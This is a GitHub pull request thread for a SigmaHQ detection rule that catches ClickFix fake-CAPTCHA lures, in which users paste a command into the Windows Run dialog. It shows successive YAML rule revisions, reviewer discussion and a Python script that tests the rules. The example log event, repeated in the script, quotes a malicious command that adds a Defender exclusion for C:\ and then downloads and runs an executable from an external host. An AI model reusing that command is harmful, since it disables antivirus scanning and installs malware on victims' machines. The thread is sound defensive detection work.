Adding rule for detecting recaptcha phish process executions
Summary of the Pull Request
Adding rule for detecting recaptcha phish process executions
Changelog
New: proc_creation_win_powershell_fake_captcha.yml
Example Log Event
cmd /c "powershell Add-MpPreference -ExclusionPath 'C:\' && timeout 2 && powershell Invoke-WebRequest -Uri 'http://book[.]rollingvideogames[.]com/temp/1.exe' -OutFile '%TEMP%\1.exe' && start %TEMP%\1.exe" # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1212''
Reference: https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
Fixed Issues
N/A
SigmaHQ Rule Creation Conventions
- If your PR adds new rules, please consider following and applying these conventions
Hi, I have observed other patterns among malware abusing this ClickFix technique and adjusted @montysecurity's rule accordingly. His rule was slightly incorrect as well, because for the log event given in his example the Image will be cmd.exe (with ParentImage explorer.exe), not powershell.exe.
That's why I added them on the CommandLine rather than on the Image, just to be safe.
proc_creation_win_susp_clickfix_execution_pattern.yml
title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
- https://github.com/JohnHammond/recaptcha-phish
- https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
- https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
- https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
- https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
- attack.execution
- attack.t1204.001
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\explorer.exe'
selection_cmd_1:
CommandLine|contains:
- 'I am not a robot - reCAPTCHA Verification'
- 'Verify you are human - Ray Verification ID:'
selection_cmd_2:
CommandLine|contains:
- 'mshta'
- 'powershell'
# Add more potentially suspicious executables used for malware download/execution
condition: all of selection_*
falsepositives:
- Highly unlikely
level: high
cc @nasbench, @frack113
Good eye and thanks for the assist @swachchhanda000 !
You do not need the CLI for the binaries as the captcha strings are enough.
@nasbench , @frack113
See this,
https://app.any.run/tasks/61fd06c8-2332-450d-b44b-091fe5094335/?utm_source=twitter&utm_medium=post&utm_campaign=fake_booking&utm_term=060325&utm_content=linktoservice
https://x.com/anyrun_app/status/1897651321462784280
I guess we also need to add 'I'm human ID' in the commandline,
or try to think more generically.
@swachchhanda000, what about something like this? Going for the more generic approach:
title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
- https://github.com/JohnHammond/recaptcha-phish
- https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
- https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
- https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
- https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel(Nextron Systems)
date: 2025-03-04
tags:
- attack.execution
- attack.t1204.001
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\explorer.exe'
selection_cmd_1:
CommandLine|contains:
- 'robot'
- 'captcha'
- 'recaptcha'
- 'human'
- 'verify'
- 'verification'
selection_cmd_2:
CommandLine|contains:
- '#' # PowerShell Comment
selection_cmd_3:
CommandLine|contains:
- 'mshta'
- 'powershell'
- 'certutil'
- 'scrobj.dll'
# Add more potentially suspicious executables used for malware download/execution
selection_cmd_4:
CommandLine|contains:
- 'https://'
- 'http://'
condition: all of selection_*
falsepositives:
- Highly unlikely
level: high
Hi, after some brief research, I discovered that there are other forms of fake CAPTCHA messages being used in these lures. The '#' symbol remains a consistent element across all of them. Therefore, I made some adjustments by removing the suspicious executables to ensure the rule is not overly specific.
title: Potential ClickFix Execution Pattern
id: d487ed4a-fd24-436d-a0b2-f4e95f7b2635
status: experimental
description: |
Detects potential ClickFix execution patterns leveraging social engineering techniques where users are tricked into running malicious commands via clipboard manipulation.
This attack starts with users visiting malicious websites, often impersonating legitimate news or service platforms.
These websites display fake CAPTCHA challenges labeled as "I am not a robot - reCAPTCHA Verification," instructing users to press Windows + R, paste clipboard contents into the Run dialog, and execute the command.
The clipboard content typically contains mshta.exe or powershell.exe commands that download and execute malware, such as Lumma Stealer or other information stealers.
This technique exploits user trust and bypasses traditional malware defenses by relying on user interaction.
references:
- https://github.com/JohnHammond/recaptcha-phish
- https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
- https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
- https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
- https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: montysecurity, Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-03-22
tags:
- attack.execution
- attack.t1204.001
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\explorer.exe'
CommandLine|contains: '#'
selection_cmd:
CommandLine|contains:
# Add more suspicious keyword
- 'account'
- 'anti-bot'
- 'botcheck'
- 'captcha'
- 'challenge'
- 'confirmation'
- 'fraud'
- 'human'
- 'identity'
- 'robot'
- 'validation'
- 'verification'
- 'verify'
condition: all of selection_*
falsepositives:
- Highly unlikely
level: high
cc @montysecurity, @nasbench, @frack113
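The two points argued in this thread (the Run dialog spawns cmd.exe under explorer.exe, so the lure text lives on the CommandLine rather than on the Image of a powershell.exe child; and the '#' plus a keyword generalises across lure variants while a bare 'http' match is noisier) can be checked against sample events. The block below is an added example, not code from the PR or the SigmaHQ repository. It evaluates the rule variants discussed above over constructed process_creation events modelling the process tree of the command in the PR description. Assumptions: the "image-based" rule shape is inferred from the comment describing the original rule (Image endswith powershell.exe/mshta.exe), the "I'm human ID" command line and the benign admin command are constructed here, and `contains_any` approximates Sigma's case-insensitive `contains` modifier.

```python
"""Added example (not part of the SigmaHQ PR): evaluate the ClickFix rule
variants from the thread over constructed process_creation events."""

# Command pasted into the Run dialog, taken from the PR description.
LURE = ("cmd /c \"powershell Add-MpPreference -ExclusionPath 'C:\\' && timeout 2 && "
        "powershell Invoke-WebRequest -Uri 'http://book[.]rollingvideogames[.]com/temp/1.exe' "
        "-OutFile '%TEMP%\\1.exe' && start %TEMP%\\1.exe\" "
        "# ✅ ''I am not a robot - reCAPTCHA Verification ID: 1212''")

# Constructed events (Sysmon/Sigma process_creation field names). Not real telemetry.
EVENTS = {
    # What Win+R actually spawns: cmd.exe under explorer.exe, full pasted text on the command line.
    "run_dialog_cmd": {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": LURE,
    },
    # powershell.exe child of that cmd.exe: parent is cmd.exe and the lure text is gone.
    "child_powershell": {
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell Add-MpPreference -ExclusionPath 'C:\\'",
    },
    # Constructed variant using the "I'm human ID" wording mentioned in the thread.
    "human_id_variant": {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://example.invalid/x.hta # I'm human ID: 4471",
    },
    # Constructed benign case: an admin launching a script with a URL argument from explorer.
    "admin_url": {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -File C:\\tools\\fetch.ps1 -Uri https://intranet.example/agent.msi",
    },
}

CAPTCHA_STRINGS = ["I am not a robot - reCAPTCHA Verification",
                   "Verify you are human - Ray Verification ID:"]
KEYWORDS = ["account", "anti-bot", "botcheck", "captcha", "challenge", "confirmation",
            "fraud", "human", "identity", "robot", "validation", "verification", "verify"]


def contains_any(value, needles):
    """Approximates Sigma's 'contains' modifier: case-insensitive substring match."""
    v = value.lower()
    return any(n.lower() in v for n in needles)


def parent_is_explorer(e):
    return e["ParentImage"].lower().endswith("\\explorer.exe")


def rule_image_based(e):
    """Assumed shape of the original rule: explorer.exe parent, powershell/mshta Image, lure string."""
    return (parent_is_explorer(e)
            and e["Image"].lower().endswith(("\\powershell.exe", "\\mshta.exe"))
            and contains_any(e["CommandLine"], CAPTCHA_STRINGS))


def rule_v1_commandline(e):
    """First revision in the thread: lure string and mshta/powershell both on the CommandLine."""
    return (parent_is_explorer(e)
            and contains_any(e["CommandLine"], CAPTCHA_STRINGS)
            and contains_any(e["CommandLine"], ["mshta", "powershell"]))


def rule_final_keyword(e):
    """Final revision: explorer.exe parent, a '#' comment hiding the lure text, and a keyword."""
    return (parent_is_explorer(e)
            and "#" in e["CommandLine"]
            and contains_any(e["CommandLine"], KEYWORDS))


def rule_generic_http(e):
    """Medium-level alternative: any explorer.exe child with 'http' on the command line."""
    return parent_is_explorer(e) and "http" in e["CommandLine"].lower()


RULES = {"image_based": rule_image_based, "v1_commandline": rule_v1_commandline,
         "final_keyword": rule_final_keyword, "generic_http": rule_generic_http}


def evaluate(events=EVENTS, rules=RULES):
    """Return {event_name: [names of rules that fire on it]}."""
    return {name: [r for r, fn in rules.items() if fn(ev)] for name, ev in events.items()}


if __name__ == "__main__":
    for name, hits in evaluate().items():
        print(f"{name:18s} -> {hits or ['(no match)']}")
```

Running it shows the image-based shape firing on nothing (the explorer.exe child is cmd.exe, and the powershell.exe grandchild has neither the explorer.exe parent nor the lure string), the CommandLine-based revisions catching the Run-dialog event, only the '#' plus keyword revision also catching the "I'm human ID" variant, and the bare 'http' rule being the only one to fire on the constructed admin command.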
Or we can be a little bit more generic by looking at explorer.exe as ParentImage and a command line containing 'http', as a medium-level rule. Let me know what you think.
title: Suspicious User-Initiated URL Execution via Explorer
id: df66b1ea-4ffe-4089-92b4-44d163b40d27
status: experimental
description: |
Detects instances where Explorer.exe spawns processes with command lines containing URLs.
This could indicate a user being socially engineered to execute commands via clipboard manipulation, such as in ClickFix or similar malware delivery campaigns.
It may also catch generic misuse where users are manually launching download cradles or scripts that reference external resources.
references:
- https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
- https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-03-22
tags:
- attack.execution
- attack.t1204.001
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\explorer.exe'
CommandLine|contains: 'http'
condition: selection
falsepositives:
- IT administrators or power users launching trusted tools/scripts with URLs manually from explorer
- In-house tools that might pass URLs as arguments via explorer-launched processes
level: medium
Thanks @swachchhanda000 ! Given the target of the hunt being recaptcha, I like the first one you list there (Potential ClickFix Execution Pattern) better.
The second one is a good hunt as well, and yet I think it expands the scope a bit too far outside of recaptcha/clickfix. It definitely has some value though, so maybe as a separate rule?
I prefer to stay with the pattern:
selection_parent:
ParentImage|endswith: '\explorer.exe'
CommandLine|contains: '#'
selection_cmd:
CommandLine|contains:
# Add more suspicious keyword
CommandLine|contains: 'http' may have too many false positives.